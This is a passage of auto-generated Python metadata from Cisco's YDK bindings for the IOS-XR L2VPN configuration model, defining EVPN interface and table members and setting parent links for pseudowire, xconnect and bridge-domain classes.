''' Enter Ethernet Segment configuration submode
''',
'ethernet_segment',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnac-timers', REFERENCE_CLASS, 'EvpnacTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
[], [],
''' Enter Interface-specific timers configuration
submode
''',
'evpnac_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MVRP MAC Flush mode
''',
'mac_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interface',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables.EvpnInterfaces' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables.EvpnInterfaces',
False,
[
_MetaInfoClassMember('evpn-interface', REFERENCE_LIST, 'EvpnInterface' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
[], [],
''' Attachment circuit interface
''',
'evpn_interface',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-interfaces',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn.EvpnTables' : {
'meta_info' : _MetaInfoClass('Evpn.EvpnTables',
False,
[
_MetaInfoClassMember('evpn-interfaces', REFERENCE_CLASS, 'EvpnInterfaces' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnInterfaces',
[], [],
''' Attachment Circuit interfaces
''',
'evpn_interfaces',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-load-balancing', REFERENCE_CLASS, 'EvpnLoadBalancing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnLoadBalancing',
[], [],
''' Enter EVPN Loadbalancing configuration submode
''',
'evpn_load_balancing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-timers', REFERENCE_CLASS, 'EvpnTimers' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnTimers',
[], [],
''' Enter EVPN timers configuration submode
''',
'evpn_timers',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnbgp-auto-discovery', REFERENCE_CLASS, 'EvpnbgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in EVPN
''',
'evpnbgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpnevis', REFERENCE_CLASS, 'Evpnevis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables.Evpnevis',
[], [],
''' Enter EVPN EVI configuration submode
''',
'evpnevis',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn-tables',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'Evpn' : {
'meta_info' : _MetaInfoClass('Evpn',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable EVPN feature
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('evpn-tables', REFERENCE_CLASS, 'EvpnTables' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'Evpn.EvpnTables',
[], [],
''' EVPN submodes
''',
'evpn_tables',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
}
_meta_table['L2Vpn.PwRouting.PwRoutingBgp.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info']
_meta_table['L2Vpn.PwRouting.PwRoutingBgp']['meta_info'].parent =_meta_table['L2Vpn.PwRouting']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S.ErpPort0']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps.Port1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Rpl']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance.Aps']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances.ErpInstance']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.None_']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1.VirtualOrInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S.ErpPort1']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort0S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpInstances']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring.ErpPort1S']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings.G8032Ring']['meta_info'].parent =_meta_table['L2Vpn.Database.G8032Rings']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits.BackupAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns.PseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire.BackupMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires.BackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpRemoteCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpSecondaryLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes.L2TpLocalCookie']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.MplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.BackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStaticAttributes']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress.L2TpStatic']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.Neighbor']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire.PseudowireAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires.Pseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions.MonitorSession']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds.PseudowireRouted']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits.AttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.BackupAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info']
